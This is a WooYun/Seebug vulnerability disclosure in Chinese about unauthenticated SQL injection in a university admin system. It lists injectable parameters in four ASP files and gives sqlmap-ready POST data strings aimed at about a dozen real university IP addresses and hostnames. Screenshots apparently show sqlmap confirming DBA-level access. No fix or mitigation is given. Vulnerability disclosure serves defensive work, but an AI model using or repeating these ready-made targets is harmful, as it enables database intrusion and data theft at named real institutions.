某高校在用系统SQL注入（DBA）（无需登录）2-5

来源

http://wooyun.org/bugs/wooyun-2015-0105892

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： ·· ### 详细说明： [WooYun: 某高校在用系统sql注入（打包）（DBA）（无需登录）2](http://www.wooyun.org/bugs/wooyun-2015-0101213) 上一发注入文件参数：language.asp editLangCode 案例 202.195.243.37/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.120.121.200/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode pss.uestc.edu.cn/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.203.222.222/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 218.242.146.229/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.193.70.164/TASi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.120.227.60/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 59.72.151.17:8000/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.197.127.125/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 218.199.187.117:8080/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.119.83.2/apatasi30/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 218.242.146.229/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 前两个丢进Sqlmap [<img src="https://images.seebug.org/upload/201504/041851343cf6a5757f52e1e83706dac91dc10678.png" alt="屏幕截图(1112).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/041851343cf6a5757f52e1e83706dac91dc10678.png) [<img src="https://images.seebug.org/upload/201504/04185144b366fa2dae4234a1e108e5508d67d51d.png" alt="屏幕截图(1113).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04185144b366fa2dae4234a1e108e5508d67d51d.png) [<img src="https://images.seebug.org/upload/201504/04185231b8f5edcb4d537406c8313762bd520c99.png" alt="屏幕截图(1114).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04185231b8f5edcb4d537406c8313762bd520c99.png) [<img src="https://images.seebug.org/upload/201504/04185239dec97486c043b0e338b557d5efee32f2.png" alt="屏幕截图(1115).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04185239dec97486c043b0e338b557d5efee32f2.png) 注入文件参数：tutordept.asp txtDeptName 案例 202.195.243.37/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.120.121.200/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName pss.uestc.edu.cn/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.203.222.222/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 218.242.146.229/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.193.70.164/TASi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.120.227.60/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 59.72.151.17:8000/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.197.127.125/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 218.199.187.117:8080/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.119.83.2/apatasi30/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 218.242.146.229/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 前两个丢进sqlmap [<img src="https://images.seebug.org/upload/201504/0419010739e59103d36633cfb31c9f6c5737982a.png" alt="屏幕截图(1116).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/0419010739e59103d36633cfb31c9f6c5737982a.png) [<img src="https://images.seebug.org/upload/201504/04190117d4641a3c44b7055a5420da3f4cde304c.png" alt="屏幕截图(1117).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04190117d4641a3c44b7055a5420da3f4cde304c.png) [<img src="https://images.seebug.org/upload/201504/04190126b7ba66013207a6b8a9def0a9e997bfd4.png" alt="屏幕截图(1118).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04190126b7ba66013207a6b8a9def0a9e997bfd4.png) [WooYun: 某高校在用系统sql注入（打包）（DBA）（无需登录）2](http://www.wooyun.org/bugs/wooyun-2015-0101213) 上一个注入文件参数：subject.asp editSClassName 案例 202.195.243.37/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 202.120.121.200/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName pss.uestc.edu.cn/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 202.203.222.222/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 218.242.146.229/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 202.193.70.164/TASi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 202.120.227.60/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 59.72.151.17:8000/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 202.197.127.125/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 218.199.187.117:8080/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 202.119.83.2/apatasi30/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 218.242.146.229/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName 前两个丢进sqlmap [<img src="https://images.seebug.org/upload/201504/04192235413653ae4f69cc595ba862b940f37249.png" alt="屏幕截图(1119).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04192235413653ae4f69cc595ba862b940f37249.png) [<img src="https://images.seebug.org/upload/201504/04192244d3456e6eca685704a783a1336f4c8e66.png" alt="屏幕截图(1120).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04192244d3456e6eca685704a783a1336f4c8e66.png) [<img src="https://images.seebug.org/upload/201504/041922522d2be922a362bc9e39bcc0bf71e49155.png" alt="屏幕截图(1121).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/041922522d2be922a362bc9e39bcc0bf71e49155.png) [<img src="https://images.seebug.org/upload/201504/0419230312a643d3f6632594824f02c61c5e890e.png" alt="屏幕截图(1122).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/0419230312a643d3f6632594824f02c61c5e890e.png) [WooYun: 某高校在用系统sql注入（打包）（DBA）（无需登录）2](http://www.wooyun.org/bugs/wooyun-2015-0101213) 上一个注入文件参数:usermng.asp txtLogin 案例 202.195.243.37/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.120.121.200/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin pss.uestc.edu.cn/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.203.222.222/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 218.242.146.229/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.193.70.164/TASi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.120.227.60/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 59.72.151.17:8000/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.197.127.125/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 218.199.187.117:8080/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.119.83.2/apatasi30/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 218.242.146.229/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 前两个sqlmap的结果 [<img src="https://images.seebug.org/upload/201504/04193148feadca08d83596fd8f27294f56933afa.png" alt="屏幕截图(1123).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/04193148feadca08d83596fd8f27294f56933afa.png) [<img src="https://images.seebug.org/upload/201504/041931570a26b5cc71377629b4ccfe084d343fd7.png" alt="屏幕截图(1124).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/041931570a26b5cc71377629b4ccfe084d343fd7.png) [<img src="https://images.seebug.org/upload/201504/041932073d03004b0135a00b60bc335a8304ed1e.png" alt="屏幕截图(1125).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/041932073d03004b0135a00b60bc335a8304ed1e.png) [<img src="https://images.seebug.org/upload/201504/0419321742a68715c04d6d14b4ead2ff9dfcf2b3.png" alt="屏幕截图(1126).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/0419321742a68715c04d6d14b4ead2ff9dfcf2b3.png) ### 漏洞证明： ···

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-0105892

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

某高校在用系统SQL注入（DBA）（无需登录）2-5

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

某高校在用系统SQL注入（DBA）（无需登录）2-5

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定